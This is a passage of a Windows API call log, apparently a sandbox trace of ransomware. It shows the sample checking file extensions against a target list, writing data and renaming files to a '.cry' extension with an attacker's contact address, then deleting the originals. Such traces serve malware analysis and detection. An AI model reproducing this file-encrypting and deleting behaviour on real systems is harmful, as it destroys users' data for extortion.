lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x430, lpOverlapped=0x0) returned 1 [0037.491] ReadFile (in: hFile=0x184, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0037.491] WriteFile (in: hFile=0x17c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe0, lpOverlapped=0x0) returned 1 [0037.491] SetEndOfFile (hFile=0x17c) returned 1 [0037.491] CloseHandle (hObject=0x17c) returned 1 [0037.492] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0037.492] SetEndOfFile (hFile=0x184) returned 1 [0037.493] CloseHandle (hObject=0x184) returned 1 [0037.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0037.494] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.gif")) returned 1 [0037.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.494] lstrlenW (lpString=".doc") returned 4 [0037.494] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0037.494] lstrlenW (lpString=".docx") returned 5 [0037.494] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0037.494] lstrlenW (lpString=".pdf") returned 4 [0037.494] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0037.494] lstrlenW (lpString=".xls") returned 4 [0037.494] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0037.494] lstrlenW (lpString=".xlsx") returned 5 [0037.494] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0037.494] lstrlenW (lpString=".ppt") returned 4 [0037.494] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0037.494] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.494] lstrlenW (lpString=".zip") returned 4 [0037.494] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0037.494] lstrlenW (lpString=".rar") returned 4 [0037.494] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0037.495] lstrlenW (lpString=".bz2") returned 4 [0037.495] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0037.495] lstrlenW (lpString=".7z") returned 3 [0037.495] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0037.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.495] lstrlenW (lpString=".dbf") returned 4 [0037.495] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0037.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.495] lstrlenW (lpString=".1cd") returned 4 [0037.495] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0037.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.496] lstrlenW (lpString=".jpg") returned 4 [0037.496] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0037.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.496] lstrlenW (lpString=".doc") returned 4 [0037.496] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0037.496] lstrlenW (lpString=".docx") returned 5 [0037.496] lstrcmpiW (lpString1=".docx", lpString2="S.GIF") returned -1 [0037.496] lstrlenW (lpString=".pdf") returned 4 [0037.496] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0037.496] lstrlenW (lpString=".xls") returned 4 [0037.496] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0037.496] lstrlenW (lpString=".xlsx") returned 5 [0037.496] lstrcmpiW (lpString1=".xlsx", lpString2="S.GIF") returned -1 [0037.496] lstrlenW (lpString=".ppt") returned 4 [0037.496] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0037.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.496] lstrlenW (lpString=".zip") returned 4 [0037.496] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0037.496] lstrlenW (lpString=".rar") returned 4 [0037.496] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0037.496] lstrlenW (lpString=".bz2") returned 4 [0037.496] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0037.496] lstrlenW (lpString=".7z") returned 3 [0037.496] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0037.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.496] lstrlenW (lpString=".dbf") returned 4 [0037.496] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0037.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.497] lstrlenW (lpString=".1cd") returned 4 [0037.497] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0037.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 61 [0037.497] lstrlenW (lpString=".jpg") returned 4 [0037.497] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0037.497] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0037.497] lstrlenW (lpString="Content.xml") returned 11 [0037.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0037.656] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=27045) returned 1 [0037.656] CloseHandle (hObject=0x184) returned 1 [0037.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0037.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.656] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.656] lstrlenW (lpString=".doc") returned 4 [0037.657] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString=".docx") returned 5 [0037.657] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0037.657] lstrlenW (lpString=".pdf") returned 4 [0037.657] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString=".xls") returned 4 [0037.657] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString=".xlsx") returned 5 [0037.657] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0037.657] lstrlenW (lpString=".ppt") returned 4 [0037.657] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.657] lstrlenW (lpString=".zip") returned 4 [0037.657] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.657] lstrlenW (lpString=".rar") returned 4 [0037.657] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString=".bz2") returned 4 [0037.657] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString=".7z") returned 3 [0037.657] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.657] lstrlenW (lpString=".dbf") returned 4 [0037.657] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.657] lstrlenW (lpString=".1cd") returned 4 [0037.657] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.657] lstrlenW (lpString=".jpg") returned 4 [0037.657] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.657] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.657] lstrlenW (lpString=".doc") returned 4 [0037.657] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.657] lstrlenW (lpString=".docx") returned 5 [0037.657] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0037.657] lstrlenW (lpString=".pdf") returned 4 [0037.657] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.658] lstrlenW (lpString=".xls") returned 4 [0037.658] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.658] lstrlenW (lpString=".xlsx") returned 5 [0037.658] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0037.658] lstrlenW (lpString=".ppt") returned 4 [0037.658] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.658] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.658] lstrlenW (lpString=".zip") returned 4 [0037.658] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.658] lstrlenW (lpString=".rar") returned 4 [0037.658] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.658] lstrlenW (lpString=".bz2") returned 4 [0037.658] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.658] lstrlenW (lpString=".7z") returned 3 [0037.658] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.658] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.658] lstrlenW (lpString=".dbf") returned 4 [0037.658] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.658] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.658] lstrlenW (lpString=".1cd") returned 4 [0037.658] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.658] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0037.658] lstrlenW (lpString=".jpg") returned 4 [0037.658] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.658] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0037.658] lstrlenW (lpString="boxed-delete.avi") returned 16 [0037.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0038.807] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=31744) returned 1 [0038.807] CloseHandle (hObject=0x188) returned 1 [0038.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0038.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.807] lstrlenW (lpString=".doc") returned 4 [0038.807] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.807] lstrlenW (lpString=".docx") returned 5 [0038.807] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0038.807] lstrlenW (lpString=".pdf") returned 4 [0038.807] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.807] lstrlenW (lpString=".xls") returned 4 [0038.807] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.807] lstrlenW (lpString=".xlsx") returned 5 [0038.807] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0038.807] lstrlenW (lpString=".ppt") returned 4 [0038.807] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.807] lstrlenW (lpString=".zip") returned 4 [0038.807] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.808] lstrlenW (lpString=".rar") returned 4 [0038.808] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.808] lstrlenW (lpString=".bz2") returned 4 [0038.808] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.808] lstrlenW (lpString=".7z") returned 3 [0038.808] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.808] lstrlenW (lpString=".dbf") returned 4 [0038.808] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.808] lstrlenW (lpString=".1cd") returned 4 [0038.808] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.808] lstrlenW (lpString=".jpg") returned 4 [0038.808] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.808] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.808] lstrlenW (lpString=".doc") returned 4 [0038.808] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.808] lstrlenW (lpString=".docx") returned 5 [0038.808] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0038.808] lstrlenW (lpString=".pdf") returned 4 [0038.808] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.808] lstrlenW (lpString=".xls") returned 4 [0038.808] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.809] lstrlenW (lpString=".xlsx") returned 5 [0038.809] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0038.809] lstrlenW (lpString=".ppt") returned 4 [0038.809] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.809] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.809] lstrlenW (lpString=".zip") returned 4 [0038.809] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.809] lstrlenW (lpString=".rar") returned 4 [0038.809] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.809] lstrlenW (lpString=".bz2") returned 4 [0038.809] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.809] lstrlenW (lpString=".7z") returned 3 [0038.809] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.862] lstrlenW (lpString=".dbf") returned 4 [0038.862] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.862] lstrlenW (lpString=".1cd") returned 4 [0038.862] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.862] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0038.862] lstrlenW (lpString=".jpg") returned 4 [0038.862] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.863] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0038.863] lstrlenW (lpString="oskpred.xml") returned 11 [0038.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0039.329] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=215) returned 1 [0039.329] CloseHandle (hObject=0x184) returned 1 [0039.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml")) returned 0x20 [0039.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.330] lstrlenW (lpString=".doc") returned 4 [0039.330] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString=".docx") returned 5 [0039.330] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0039.330] lstrlenW (lpString=".pdf") returned 4 [0039.330] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString=".xls") returned 4 [0039.330] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString=".xlsx") returned 5 [0039.330] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0039.330] lstrlenW (lpString=".ppt") returned 4 [0039.330] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.330] lstrlenW (lpString=".zip") returned 4 [0039.330] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.330] lstrlenW (lpString=".rar") returned 4 [0039.330] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString=".bz2") returned 4 [0039.330] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString=".7z") returned 3 [0039.330] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.330] lstrlenW (lpString=".dbf") returned 4 [0039.330] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.330] lstrlenW (lpString=".1cd") returned 4 [0039.330] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.330] lstrlenW (lpString=".jpg") returned 4 [0039.330] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.331] lstrlenW (lpString=".doc") returned 4 [0039.331] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString=".docx") returned 5 [0039.331] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0039.331] lstrlenW (lpString=".pdf") returned 4 [0039.331] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString=".xls") returned 4 [0039.331] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString=".xlsx") returned 5 [0039.331] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0039.331] lstrlenW (lpString=".ppt") returned 4 [0039.331] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.331] lstrlenW (lpString=".zip") returned 4 [0039.331] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.331] lstrlenW (lpString=".rar") returned 4 [0039.331] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString=".bz2") returned 4 [0039.331] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString=".7z") returned 3 [0039.331] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.331] lstrlenW (lpString=".dbf") returned 4 [0039.331] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.331] lstrlenW (lpString=".1cd") returned 4 [0039.331] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0039.331] lstrlenW (lpString=".jpg") returned 4 [0039.331] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.332] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0039.332] lstrlenW (lpString="symbols.xml") returned 11 [0039.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0039.745] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=591) returned 1 [0039.745] CloseHandle (hObject=0x17c) returned 1 [0039.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml")) returned 0x20 [0039.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.745] lstrlenW (lpString=".doc") returned 4 [0039.745] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.745] lstrlenW (lpString=".docx") returned 5 [0039.745] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0039.746] lstrlenW (lpString=".pdf") returned 4 [0039.746] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.746] lstrlenW (lpString=".xls") returned 4 [0039.746] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.746] lstrlenW (lpString=".xlsx") returned 5 [0039.746] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0039.746] lstrlenW (lpString=".ppt") returned 4 [0039.746] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.746] lstrlenW (lpString=".zip") returned 4 [0039.746] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.746] lstrlenW (lpString=".rar") returned 4 [0039.746] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.746] lstrlenW (lpString=".bz2") returned 4 [0039.746] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.746] lstrlenW (lpString=".7z") returned 3 [0039.746] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 